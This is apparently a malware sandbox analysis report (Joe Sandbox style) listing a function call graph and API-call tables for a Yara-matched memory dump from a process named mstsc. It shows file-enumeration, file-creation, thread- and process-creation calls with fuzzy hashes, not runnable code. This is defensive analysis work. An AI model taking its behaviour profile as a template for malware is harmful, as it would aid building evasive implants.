82624->82622 82624->82623 82626 337990 2 API calls 82624->82626 82714 337fe0 12 API calls 82624->82714 82626->82624 82628 33c85f 82627->82628 82629 33c859 82627->82629 82722 339e10 82628->82722 82715 33df10 82629->82715 82632 33c86c 82633 33cae8 82632->82633 82634 34f8c0 3 API calls 82632->82634 82633->82571 82635 33c888 82634->82635 82636 33c89c 82635->82636 82637 33e7e0 2 API calls 82635->82637 82731 34c430 82636->82731 82637->82636 82640 33c9c3 82738 33c7e0 LdrLoadDll LdrInitializeThunk 82640->82738 82641 34c620 2 API calls 82642 33c91a 82641->82642 82642->82640 82646 33c926 82642->82646 82644 33c9e2 82645 33c9ea 82644->82645 82739 33c750 LdrLoadDll NtClose LdrInitializeThunk 82644->82739 82648 34cbb0 2 API calls 82645->82648 82646->82633 82647 33c96c 82646->82647 82650 34c730 2 API calls 82646->82650 82652 34cbb0 2 API calls 82647->82652 82651 33c9f4 82648->82651 82650->82647 82651->82571 82655 33c989 82652->82655 82653 33ca0c 82653->82645 82654 33ca13 82653->82654 82657 33ca2b 82654->82657 82740 33c6d0 82654->82740 82734 34baa0 82655->82734 82743 34c4b0 LdrLoadDll 82657->82743 82658 33c9a0 82658->82633 82737 337b40 LdrLoadDll 82658->82737 82661 33ca3f 82744 33c520 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82661->82744 82664 33c9b9 82664->82571 82665 33ca63 82666 33caa4 82665->82666 82745 34c4e0 LdrLoadDll 82665->82745 82747 34c540 LdrLoadDll 82666->82747 82669 33cab2 82671 34cbb0 2 API calls 82669->82671 82670 33ca81 82670->82666 82746 34c570 LdrLoadDll 82670->82746 82672 33cabc 82671->82672 82673 34cbb0 2 API calls 82672->82673 82675 33cac6 82673->82675 82675->82633 82748 337b40 LdrLoadDll 82675->82748 82678 33e7f3 82677->82678 82770 34c5b0 82678->82770 82682 33e277 82681->82682 82683 33e257 82681->82683 82688 33e2b9 82682->82688 82796 33de90 82682->82796 82683->82682 82776 33e050 82683->82776 82687 33e311 82687->82575 82689 33e2eb 82688->82689 82818 33d840 12 API calls 82688->82818 82689->82687 82819 34b1e0 13 API calls 82689->82819 82694 347690 10 API calls 82694->82688 82696 33e62d 82695->82696 82702 34c6e0 82696->82702 82699 33e675 82699->82612 82703 34d6b0 LdrLoadDll 82702->82703 82704 34c6fc 82703->82704 82712 4682e50 LdrInitializeThunk 82704->82712 82705 33e66e 82705->82699 82707 34c730 82705->82707 82708 34d6b0 LdrLoadDll 82707->82708 82709 34c74c 82708->82709 82713 4682c30 LdrInitializeThunk 82709->82713 82710 33e69e 82710->82612 82712->82705 82713->82710 82714->82624 82749 33d8c0 82715->82749 82717 33e032 82718 34e6f0 2 API calls 82717->82718 82719 33e041 82718->82719 82719->82628 82720 33df2e 82720->82717 82758 34b920 82720->82758 82724 339e2b 82722->82724 82723 339f4b 82723->82632 82724->82723 82725 33e450 3 API calls 82724->82725 82726 339f2c 82725->82726 82727 339f5a 82726->82727 82728 339f41 82726->82728 82729 34cbb0 2 API calls 82726->82729 82727->82632 82769 336d00 LdrLoadDll 82728->82769 82729->82728 82732 34d6b0 LdrLoadDll 82731->82732 82733 33c8f0 82732->82733 82733->82633 82733->82640 82733->82641 82735 33e7e0 2 API calls 82734->82735 82736 34bad2 82735->82736 82736->82658 82737->82664 82738->82644 82739->82653 82741 34c730 2 API calls 82740->82741 82742 33c70b 82741->82742 82742->82657 82743->82661 82744->82665 82745->82670 82746->82666 82747->82669 82748->82633 82750 33d8f3 82749->82750 82764 33b9e0 82750->82764 82752 33d905 82753 33e610 3 API calls 82752->82753 82754 33d949 82753->82754 82755 33d950 82754->82755 82768 34e730 LdrLoadDll RtlAllocateHeap 82754->82768 82755->82720 82757 33d960 82757->82720 82759 34b92f 82758->82759 82760 347aa0 LdrLoadDll 82759->82760 82761 34b947 82760->82761 82762 34b96d 82761->82762 82763 34b95a CreateThread 82761->82763 82762->82717 82763->82717 82765 33ba07 82764->82765 82766 33b6f0 LdrLoadDll 82765->82766 82767 33ba43 82766->82767 82767->82752 82768->82757 82769->82723 82771 34d6b0 LdrLoadDll 82770->82771 82772 34c5cc 82771->82772 82775 4682cf0 LdrInitializeThunk 82772->82775 82773 33e81e 82773->82580 82775->82773 82777 33e080 82776->82777 82820 3469c0 82777->82820 82779 33e0d1 82849 345830 82779->82849 82781 33e0d7 82883 342620 82781->82883 82783 33e0dd 82914 344890 82783->82914 82789 33e0f1 82959 3460d0 82789->82959 82791 33e0f7 82983 33ff50 82791->82983 82793 33e10f 82999 3411f0 82793->82999 82797 33dea8 82796->82797 82801 33deff 82796->82801 82798 341430 10 API calls 82797->82798 82797->82801 82799 33dee9 82798->82799 82799->82801 83296 341680 82799->83296 82801->82687 82802 33dcd0 82801->82802 82803 33dcec 82802->82803 82807 33ddcb 82802->82807 82805 34cbb0 2 API calls 82803->82805 82803->82807 82804 33de61 82806 33de7e 82804->82806 82809 347690 10 API calls 82804->82809 82808 33dd07 82805->82808 82806->82688 82806->82694 82807->82804 83357 33d1c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82807->83357 83356 33d1c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82808->83356 82809->82806 82811 33de3b 82811->82804 83358 33d390 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82811->83358 82813 33dd3f 82815 33b6f0 LdrLoadDll 82813->82815 82816 33dd50 82815->82816 82817 33b6f0 LdrLoadDll 82816->82817 82817->82807 82818->82689 82819->82687 82821 3469e8 82820->82821 82822 33b6f0 LdrLoadDll 82821->82822 82823 3469fc 82822->82823 82824 33cf80 3 API calls 82823->82824 82826 346a2f 82824->82826 82825 346a36 82825->82779 82826->82825 82827 33b6f0 LdrLoadDll 82826->82827 82828 346a5e 82827->82828 82829 33b6f0 LdrLoadDll 82828->82829 82830 346a82 82829->82830 83004 33d040 82830->83004 82832 346ae8 82834 33b6f0 LdrLoadDll 82832->82834 82833 346aa6 82833->82832 82846 346c6b 82833->82846 83008 346710 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82833->83008 82836 346b08 82834->82836 82837 33d040 2 API calls 82836->82837 82840 346b2c 82837->82840 82838 346b72 82839 33d040 2 API calls 82838->82839 82843 346ba2 82839->82843 82840->82838 82840->82846 83009 346710 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82840->83009 82842 346be8 82845 33d040 2 API calls 82842->82845 82843->82842 82843->82846 83010 346710 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82843->83010 82847 346c47 82845->82847 82846->82779 82847->82846 83011 346710 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82847->83011 82850 345894 82849->82850 82851 33b6f0 LdrLoadDll 82850->82851 82852 345961 82851->82852 82853 33cf80 3 API calls 82852->82853 82855 345994 82853->82855 82854 34599b 82854->82781 82855->82854 82856 33b6f0 LdrLoadDll 82855->82856 82857 3459c3 82856->82857 82858 33d040 2 API calls 82857->82858 82859 345a03 82858->82859 82860 345b32 82859->82860 82881 345b23 82859->82881 83018 345620 82859->83018 82861 34cbb0 2 API calls 82860->82861 82863 345b3c 82861->82863 82863->82781 82864 345a38 82864->82860 82865 345a43 82864->82865 82866 34e6f0 2 API calls 82865->82866 82867 345a6c 82866->82867 82868 345a75 82867->82868 82869 345a8b 82867->82869 82870 34cbb0 2 API calls 82868->82870 83047 345510 CoInitialize 82869->83047 82872 345a7f 82870->82872 82872->82781 82873 345a99 83049 34c8c0 82873->83049 82875 345b12 82876 34cbb0 2 API calls 82875->82876 82877 345b1c 82876->82877 82879 34e610 2 API calls 82877->82879 82879->82881 82880 345ab7 82880->82875 82882 34c8c0 2 API calls 82880->82882 83054 345440 LdrLoadDll RtlFreeHeap 82880->83054 82881->82781 82882->82880 82884 342648 82883->82884 82885 34e6f0 2 API calls 82884->82885 82887 3426a8 82885->82887 82886 3426b1 82886->82783 82887->82886 83056 341a80 82887->83056 82889 3426da 82890 3426fa 82889->82890 83086 341d90 LdrLoadDll 82889->83086 82891 342718 82890->82891 83088 344390 13 API calls 82890->83088 82899 342732 82891->82899 83090 33b4f0 LdrLoadDll 82891->83090 82894 3426e8 82894->82890 83087 3423a0 10 API calls 82894->83087 82895 34270c 83089 344390 13 API calls 82895->83089 82900 341a80 12 API calls 82899->82900 82901 34275f 82900->82901 82902 342780 82901->82902 83091 341d90 LdrLoadDll 82901->83091 82904 34279e 82902->82904 83093 344390 13 API calls 82902->83093 82905 3427b8 82904->82905 83095 33b4f0 LdrLoadDll 82904->83095 82909 34e610 2 API calls 82905->82909 82906 34276e 82906->82902 83092 3423a0 10 API calls 82906->83092 82911 3427c2 82909->82911 82910 342792 83094 344390 13 API calls 82910->83094 82911->82783 82915 3448b6 82914->82915 82916 33b6f0 LdrLoadDll 82915->82916 82917 3448e5 82916->82917 82918 33b6f0 LdrLoadDll 82917->82918 82919 344911 82917->82919 82918->82919 83115 33ea40 82919->83115 82921 33e0e5 82925 345b50 82921->82925 82922 3449f5 82922->82921 83120 331520 82922->83120 83125 3445a0 82922->83125 82926 344890 13 API calls 82925->82926 82927 33e0eb 82926->82927 82928 3435b0 82927->82928 82929 3435d2 82928->82929 82930 33b6f0 LdrLoadDll 82929->82930 82931 34379d 82930->82931 82932 33b6f0 LdrLoadDll 82931->82932 82933 3437ae 82932->82933 82934 33b5c0 LdrLoadDll 82933->82934 82935 3437c5 82934->82935 83209 343470 82935->83209 82938 343470 13 API calls 82939 34383b 82938->82939 82940 343470 13 API calls 82939->82940 82941 343853 82940->82941 82942 343470 13 API calls 82941->82942 82943 34386b 82942->82943 82944 343470 13 API calls 82943->82944 82945 343883 82944->82945 82946 343470 13 API calls 82945->82946 82947 34389e 82946->82947 82948 3438b8 82947->82948 82949 343470 13 API calls 82947->82949 82948->82789 82950 3438ec 82949->82950 82951 343470 13 API calls 82950->82951 82952 343929 82951->82952 82953 343470 13 API calls 82952->82953 82954 343966 82953->82954 82955 343470 13 API calls 82954->82955 82956 3439a3 82955->82956 82957 343470 13 API calls 82956->82957 82958 3439e0 82957->82958 82958->82789 82960 3460ed 82959->82960 82961 33b3a0 LdrLoadDll 82960->82961 82962 346108 82961->82962 82963 347aa0 LdrLoadDll 82962->82963 82980 34630c 82962->82980 82964 346138 82963->82964 82965 347aa0 LdrLoadDll 82964->82965 82966 346151 82965->82966 82967 347aa0 LdrLoadDll 82966->82967 82968 34616a 82967->82968 82969 347aa0 LdrLoadDll 82968->82969 82970 346186 82969->82970 82971 347aa0 LdrLoadDll 82970->82971 82972 34619f 82971->82972 82973 347aa0 LdrLoadDll 82972->82973 82974 3461b8 82973->82974 82975 347aa0 LdrLoadDll 82974->82975 82976 3461d4 82975->82976 82977 347aa0 LdrLoadDll 82976->82977 82978 3461ed 82977->82978 82979 347aa0 LdrLoadDll 82978->82979 82981 346205 82979->82981 82980->82791 82981->82980 83224 345c90 LdrLoadDll 82981->83224 82984 33ff66 82983->82984 82986 33ff71 82983->82986 82985 34e6f0 2 API calls 82984->82985 82985->82986 82987 33ff87 82986->82987 82988 347aa0 LdrLoadDll 82986->82988 82989 34006c GetFileAttributesW 82986->82989 82990 3401ef 82986->82990 82993 331520 GetFileAttributesW 82986->82993 82995 33b6f0 LdrLoadDll 82986->82995 82996 3439f0 10 API calls 82986->82996 83225 34add0 82986->83225 83229 34ac60 11 API calls 82986->83229 83230 34ab00 11 API calls 82986->83230 82987->82793 82988->82986 82989->82986 82991 340208 82990->82991 82992 34e610 2 API calls 82990->82992 82991->82793 82992->82991 82993->82986 82995->82986 82996->82986 83231 340f70 82999->83231 83001 3411fd 83254 340c50 83001->83254 83003 33e121 83003->82682 83005 33d065 83004->83005 83012 34c7b0 83005->83012 83008->82832 83009->82838 83010->82842 83011->82846 83013 34d6b0 LdrLoadDll 83012->83013 83014 34c7cc 83013->83014 83017 4682b80 LdrInitializeThunk 83014->83017 83015 33d0d9 83015->82833 83017->83015 83019 34563c 83018->83019 83020 33b3a0 LdrLoadDll 83019->83020 83022 345657 83020->83022 83021 345660 83021->82864 83022->83021 83023 347aa0 LdrLoadDll 83022->83023 83024 34567d 83023->83024 83025 347aa0 LdrLoadDll 83024->83025 83026 345698 83025->83026 83027 347aa0 LdrLoadDll 83026->83027 83028 3456b1 83027->83028 83029 347aa0 LdrLoadDll 83028->83029 83030 3456cd 83029->83030 83031 347aa0 LdrLoadDll 83030->83031 83032 3456e6 83031->83032 83033 347aa0 LdrLoadDll 83032->83033 83034 3456ff 83033->83034 83035 33b3a0 LdrLoadDll 83034->83035 83036 34572b 83035->83036 83037 347aa0 LdrLoadDll 83036->83037 83046 3457d9 83036->83046 83038 34574f 83037->83038 83039 33b3a0 LdrLoadDll 83038->83039 83040 345784 83039->83040 83041 347aa0 LdrLoadDll 83040->83041 83040->83046 83042 3457a7 83041->83042 83043 347aa0 LdrLoadDll 83042->83043 83044 3457c0 83043->83044 83045 347aa0 LdrLoadDll 83044->83045 83045->83046 83046->82864 83048 345575 83047->83048 83048->82873 83050 34d6b0 LdrLoadDll 83049->83050 83051 34c8dc 83050->83051 83055 4682ac0 LdrInitializeThunk 83051->83055 83052 34c8fb 83052->82880 83054->82880 83055->83052 83057 341b18 83056->83057 83058 33b6f0 LdrLoadDll 83057->83058 83059 341bb6 83058->83059 83060 33b6f0 LdrLoadDll 83059->83060 83061 341bd1 83060->83061 83062 33d040 2 API calls 83061->83062 83063 341bf6 83062->83063 83064 341d3d 83063->83064 83096 34c840 83063->83096 83065 341d4e 83064->83065 83101 341430 83064->83101 83065->82889 83069 341d33 83070 34cbb0 2 API calls 83069->83070 83070->83064 83071 341c2f 83072 34cbb0 2 API calls 83071->83072 83073 341c69 83072->83073 83113 34e7d0 LdrLoadDll 83073->83113 83075 341c9f 83075->83065 83076 33d040 2 API calls 83075->83076 83077 341cc5 83076->83077 83077->83065 83078 34c840 2 API calls 83077->83078 83079 341cea 83078->83079 83080 341cf1 83079->83080 83081 341d1d 83079->83081 83083 34cbb0 2 API calls 83080->83083 83082 34cbb0 2 API calls 83081->83082 83085 341d27 83082->83085 83084 341cfb 83083->83084 83084->82889 83085->82889 83086->82894 83087->82890 83088->82895 83089->82891 83090->82899 83091->82906 83092->82902 83093->82910 83094->82904 83095->82905 83097 34d6b0 LdrLoadDll 83096->83097 83098 34c85c 83097->83098 83114 4682b00 LdrInitializeThunk 83098->83114 83099 341c24 83099->83069 83099->83071 83102 341455 83101->83102 83103 33b6f0 LdrLoadDll 83102->83103 83104 341510 83103->83104 83105 33b6f0 LdrLoadDll 83104->83105 83106 341534 83105->83106 83107 347690 10 API calls 83106->83107 83109 341587 83107->83109 83108 341641 83108->83065 83109->83108 83110 33b6f0 LdrLoadDll 83109->83110 83111 3415ee 83110->83111 83112 347690 10 API calls 83111->83112 83112->83108 83113->83075 83114->83099 83116 33ea5f 83115->83116 83117 347aa0 LdrLoadDll 83115->83117 83118 33ea66 GetFileAttributesW 83116->83118 83119 33ea71 83116->83119 83117->83116 83118->83119 83119->82922 83121 33157a 83120->83121 83122 3315d5 83121->83122 83149 33ea80 83121->83149 83122->82922 83124 331593 83124->82922 83153 34af30 83125->83153 83127 34460b 83127->82922 83128 3445b6 83128->83127 83129 3445d5 83128->83129 83130 344617 83128->83130 83132 3445dd 83129->83132 83133 3445fa 83129->83133 83131 33b6f0 LdrLoadDll 83130->83131 83136 344628 83131->83136 83134 34e610 2 API calls 83132->83134 83135 34e610 2 API calls 83133->83135 83137 3445ee 83134->83137 83135->83127 83138 347690 10 API calls 83136->83138 83137->82922 83139 34463f 83138->83139 83193 3439f0 83139->83193 83141 34464a 83145 344748 83141->83145 83146 344662 83141->83146 83142 34472f 83143 34e610 2 API calls 83142->83143 83144 344853 83143->83144 83144->82922 83145->83142 83204 343f80 11 API calls 83145->83204 83146->83142 83203 343f80 11 API calls 83146->83203 83150 33ea61 GetFileAttributesW 83149->83150 83152 33ea94 83149->83152 83151 33ea71 83150->83151 83151->83124 83152->83124 83154 34af3e 83153->83154 83155 34af45 83153->83155 83154->83128 83156 33b3a0 LdrLoadDll 83155->83156 83157 34af77 83156->83157 83160 34af86 83157->83160 83205 34aa20 LdrLoadDll 83157->83205 83159 34e6f0 2 API calls 83161 34af9f 83159->83161 83160->83159 83162 34b169 83160->83162 83161->83162 83163 34afb4 83161->83163 83164 34b118 83161->83164 83162->83128 83206 343ad0 LdrLoadDll 83163->83206 83166 34b122 83164->83166 83167 34b1bb 83164->83167 83207 343ad0 LdrLoadDll 83166->83207 83170 34e610 2 API calls 83167->83170 83168 34afcb 83174 347aa0 LdrLoadDll 83168->83174 83170->83162 83171 34b139 83208 34a350 LdrLoadDll 83171->83208 83173 34b14f 83176 347aa0 LdrLoadDll 83173->83176 83175 34afe7 83174->83175 83177 347aa0 LdrLoadDll 83175->83177 83176->83162 83178 34b003 83177->83178 83179 347aa0 LdrLoadDll 83178->83179 83180 34b022 83179->83180 83181 347aa0 LdrLoadDll 83180->83181 83182 34b03e 83181->83182 83183 347aa0 LdrLoadDll 83182->83183 83184 34b05a 83183->83184 83185 347aa0 LdrLoadDll 83184->83185 83186 34b079 83185->83186 83187 347aa0 LdrLoadDll 83186->83187 83188 34b095 83187->83188 83189 347aa0 LdrLoadDll 83188->83189 83190 34b0b8 83189->83190 83190->83162 83191 34e610 2 API calls 83190->83191 83192 34b10c 83191->83192 83192->83128 83194 347690 10 API calls 83193->83194 83195 343a06 83194->83195 83196 343a13 83195->83196 83197 347690 10 API calls 83195->83197 83196->83141 83198 343a24 83197->83198 83198->83196 83199 347690 10 API calls 83198->83199 83200 343a3f 83199->83200 83201 34e610 2 API calls 83200->83201 83202 343a4c 83201->83202 83202->83141 83203->83146 83204->83145 83205->83160 83206->83168 83207->83171 83208->83173 83210 343499 83209->83210 83211 347aa0 LdrLoadDll 83210->83211 83212 3434d6 83211->83212 83213 347aa0 LdrLoadDll 83212->83213 83214 3434f4 83213->83214 83215 347aa0 LdrLoadDll 83214->83215 83217 343516 83215->83217 83216 34359c 83216->82938 83217->83216 83218 343543 FindFirstFileW 83217->83218 83218->83216 83219 34355b 83218->83219 83220 343583 FindNextFileW 83219->83220 83223 343350 13 API calls 83219->83223 83220->83219 83222 343595 FindClose 83220->83222 83222->83216 83223->83219 83224->82981 83226 34ade6 83225->83226 83228 34aee6 83225->83228 83227 347690 10 API calls 83226->83227 83226->83228 83227->83226 83228->82986 83229->82986 83230->82986 83232 340f95 83231->83232 83233 33b6f0 LdrLoadDll 83232->83233 83234 340ffa 83233->83234 83235 33b6f0 LdrLoadDll 83234->83235 83236 341048 83235->83236 83237 33ea40 2 API calls 83236->83237 83238 34108f 83237->83238 83239 341096 83238->83239 83240 34af30 3 API calls 83238->83240 83239->83001 83242 3410a4 83240->83242 83241 3410ad 83241->83001 83242->83241 83243 33b6f0 LdrLoadDll 83242->83243 83245 3410fc 83243->83245 83244 331520 GetFileAttributesW 83244->83245 83245->83244 83246 34add0 10 API calls 83245->83246 83249 341181 83245->83249 83268 3406b0 83245->83268 83246->83245 83248 331520 GetFileAttributesW 83248->83249 83249->83248 83251 3411d9 83249->83251 83279 340a10 83249->83279 83252 34e610 2 API calls 83251->83252 83253 3411e0 83252->83253 83253->83001 83255 340c66 83254->83255 83266 340c71 83254->83266 83256 34e6f0 2 API calls 83255->83256 83256->83266 83257 340c87 83257->83003 83258 33ea40 2 API calls 83258->83266 83259 340f40 83260 340f59 83259->83260 83261 34e610 2 API calls 83259->83261 83260->83003 83261->83260 83262 331520 GetFileAttributesW 83262->83266 83263 34add0 10 API calls 83263->83266 83264 33b6f0 LdrLoadDll 83264->83266 83265 3406b0 11 API calls 83265->83266 83266->83257 83266->83258 83266->83259 83266->83262 83266->83263 83266->83264 83266->83265 83267 340a10 10 API calls 83266->83267 83267->83266 83269 3406d6 83268->83269 83270 347690 10 API calls 83269->83270 83271 340732 83270->83271 83272 3439f0 10 API calls 83271->83272 83273 34073d 83272->83273 83274 34075b 83273->83274 83276 3408c0 83273->83276 83275 3408a5 83274->83275 83285 340580 83274->83285 83275->83245 83276->83275 83277 340580 11 API calls 83276->83277 83277->83276 83280 340a36 83279->83280 83281 347690 10 API calls 83280->83281 83282 340aa7 83281->83282 83283 3439f0 10 API calls 83282->83283 83284 340ab2 83283->83284 83284->83249 83286 340596 83285->83286 83289 343e60 83286->83289 83288 34069e 83288->83274 83291 343e9d 83289->83291 83290 343f4d 83290->83288 83291->83290 83292 344e40 11 API calls 83291->83292 83293 343ef0 83291->83293 83292->83293 83294 343f29 83293->83294 83295 34e610 LdrLoadDll RtlFreeHeap 83293->83295 83294->83288 83295->83294 83297 3416a6 83296->83297 83298 347aa0 LdrLoadDll 83297->83298 83299 3416f7 83298->83299 83300 341a6a 83299->83300 83301 347690 10 API calls 83299->83301 83300->82801 83302 341712 83301->83302 83302->83300 83347 34ce00 83302->83347 83304 341748 83305 341a52 83304->83305 83306 34f8c0 3 API calls 83304->83306 83307 34e610 2 API calls 83305->83307 83308 341767 83306->83308 83307->83300 83308->83305 83309 34186a 83308->83309 83310 34c620 2 API calls 83308->83310 83350 33c7e0 LdrLoadDll LdrInitializeThunk 83309->83350 83311 3417eb 83310->83311 83311->83309 83315 3417f3 83311->83315 83313 341895 83313->83305 83316 33c6d0 2 API calls 83313->83316 83322 3418ca 83313->83322 83314 34e610 2 API calls 83319 341860 83314->83319 83315->83300 83320 33c6d0 2 API calls 83315->83320 83321 34181f 83315->83321 83328 341850 83315->83328 83316->83322 83317 34cbb0 2 API calls 83323 34182f 83317->83323 83319->82801 83320->83321 83321->83317 83351 33c520 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83322->83351 83325 34baa0 2 API calls 83323->83325 83324 3418ec 83326 341a31 83324->83326 83327 3418fa 83324->83327 83325->83328 83330 34e610 2 API calls 83326->83330 83352 34cc20 LdrLoadDll 83327->83352 83328->83314 83331 341a48 83330->83331 83331->82801 83332 341919 83333 33e610 3 API calls 83332->83333 83334 341982 83333->83334 83334->83305 83335 34198d 83334->83335 83336 34e610 2 API calls 83335->83336 83337 3419b1 83336->83337 83353 34c780 LdrLoadDll 83337->83353 83339 3419c5 83340 34c730 2 API calls 83339->83340 83341 3419ec 83340->83341 83342 3419f3 83341->83342 83354 34c780 LdrLoadDll 83341->83354 83342->82801 83344 341a19 83355 34c540 LdrLoadDll 83344->83355 83346 341a27 83346->82801 83348 34ce1c CreateProcessInternalW 83347->83348 83349 34d6b0 LdrLoadDll 83347->83349 83348->83304 83349->83348 83350->83313 83351->83324 83352->83332 83353->83339 83354->83344 83355->83346 83356->82813 83357->82811 83358->82804 83361 46829f0 LdrInitializeThunk 83362 34c038 83366 34e580 2 API calls 83362->83366 83367 34e5c4 83362->83367 83363 34c003 83363->83362 83364 34c041 83363->83364 83366->83363 83368 34e5a5 83367->83368 83369 34e5ce 83367->83369 83370 34e5b1 83368->83370 83371 34cc60 2 API calls 83368->83371 83373 34e5f9 83369->83373 83374 34cca0 LdrLoadDll 83369->83374 83370->83363 83371->83370 83373->83363 83374->83373 83375 33ee4e 83376 33ee53 83375->83376 83378 33ee3f 83375->83378 83377 347690 10 API calls 83376->83377 83377->83378
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00343551
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0034358E
                                                                                                                      • FindClose.KERNELBASE(?), ref: 00343599
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: e7ce241c3b85b9b052ac4e0789b632654bc3e17762a90df1bca4b6378e4093e3
                                                                                                                      • Instruction ID: ce7a13eee9a62d3833f61a6b3563c8daba88a77634cc108678d7c9ca1f0610fa
                                                                                                                      • Opcode Fuzzy Hash: e7ce241c3b85b9b052ac4e0789b632654bc3e17762a90df1bca4b6378e4093e3
                                                                                                                      • Instruction Fuzzy Hash: 983153B19002486BDB21DF64CC85FFF77BCEF85710F144599B509AB181DA70AB848BA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00343551
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0034358E
                                                                                                                      • FindClose.KERNELBASE(?), ref: 00343599
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: b93ab83e4ec88bb3eff7597b0a17eeb79c5fc909c494abcae3f6454d4aeb76fd
                                                                                                                      • Instruction ID: f645ceaa5de103661ee39b0bcca9e644559f03672c9be90dc8cec374c4741bd9
                                                                                                                      • Opcode Fuzzy Hash: b93ab83e4ec88bb3eff7597b0a17eeb79c5fc909c494abcae3f6454d4aeb76fd
                                                                                                                      • Instruction Fuzzy Hash: AA0167B590025CABCB15CF64CC84EFE77B8EF85715F1446D8E91997150D630DF518BA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID: #y$E
                                                                                                                      • API String ID: 2340568224-1069406378
                                                                                                                      • Opcode ID: 8247fe0d3788c96d12fb5b47f2e4e8916803814af651f4d8efe1dd61f181d1ca
                                                                                                                      • Instruction ID: 18091bbf4de9b546a0bd97ec0b1748db8e2e35645110b9e39ff80a9301fc3a00
                                                                                                                      • Opcode Fuzzy Hash: 8247fe0d3788c96d12fb5b47f2e4e8916803814af651f4d8efe1dd61f181d1ca
                                                                                                                      • Instruction Fuzzy Hash: B6E193B1D00218EFDB66DFA4DC81BEFB7B8AF44304F14455AF509AA141EB70AB44CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,003477FC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,003477FC,00000000,00000005,00000060,00000000,00000000), ref: 0034CACD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 6f198ff9efc649f14f255aa41767a058dff5d7d7d1b5a2d9643f17ee761302f5
                                                                                                                      • Instruction ID: 76a1cdd0ec4cd559bf96be0ab3721325790d33ad82610ffb176562d66d58b1b5
                                                                                                                      • Opcode Fuzzy Hash: 6f198ff9efc649f14f255aa41767a058dff5d7d7d1b5a2d9643f17ee761302f5
                                                                                                                      • Instruction Fuzzy Hash: DA01B2B2211218AFCB44DF98DC85EEB77EABF8C754F158248BA0D97641C634E851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00000005,00000000,003477FC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,003477FC,00000000,00000005,00000060,00000000,00000000), ref: 0034CACD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: e0dd4601fa567a4ece3450075541aaf07d6562baefc0b0883b59eb6e2cd73a51
                                                                                                                      • Instruction ID: 040a58cebdb568aa7ab23a2bd04f7a19f0355b8b7c4f6ad58d9af26bcd6b69c3
                                                                                                                      • Opcode Fuzzy Hash: e0dd4601fa567a4ece3450075541aaf07d6562baefc0b0883b59eb6e2cd73a51
                                                                                                                      • Instruction Fuzzy Hash: 4EF0BDB2204208ABCB08DF88DC85EEB77EDAF8C754F058208BA0D97241C630F851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
